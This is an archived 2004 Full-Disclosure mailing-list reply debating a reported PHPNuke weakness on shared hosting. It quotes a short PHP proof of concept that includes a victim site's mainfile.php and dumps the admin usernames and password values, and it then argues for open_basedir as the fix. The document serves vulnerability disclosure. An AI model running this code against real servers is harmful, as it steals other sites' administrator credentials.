Re: [Full-Disclosure] Possible bug in PHPNuke and other CMS

From: Sam Bashton (
Date: 06/01/04

  • Next message: sudharsha: "[Full-Disclosure] watch guard"
    To: Luca Falavigna <>
    Date: Tue, 1 Jun 2004 08:09:54 +0100

    On Sun, May 30, 2004 at 04:53:18PM +0200, Luca Falavigna wrote:
    > There is a vulnerability in PHPNuke that permits execution of arbitrary
    > SQL queries on a database located in the same server of an attacker's
    > account. This is the procedure: first of all attacker must create a
    > symlink pointing to victim's db directory in PHPNuke home directory
    > because of mainfile.php include method. After that he can build a simple
    > php code executing a query to the PHPNuke database. Here is an example:
    > <?php
    > require_once ("/location_of_victim's_PHPNuke/mainfile.php");
    > $sql = $db->sql_query("SELECT aid,pwd FROM ".$prefix."_authors");
    > while($record = $db->sql_fetchrow($sql))
    > ~ echo "Username: $record[aid]\n<br>\nPassword: $record[pwd]\n<br><br>\n";
    > unset($sql);
    > ?>

    This is an administration issue rather than a security vulnerability.
    In order to use this attack the attacker requires access to:

    1. Another site on the victim's server
    2. A sufficiently poorly administered server on which (s)he can:
        a. Create a symlink
        b. Specify an absolute path for includes

    Those hosting multiple PHP sites ought to be using PHP's open_basedir
    directive to limit the files that can be opened by PHP. If this isn't
    being used they are plenty of other easy attacks open to anyone with an
    account on the same server.

    Sam Bashton
    Systems Administrator
    IP Support 
    Full-Disclosure - We believe in it.

  • Next message: sudharsha: "[Full-Disclosure] watch guard"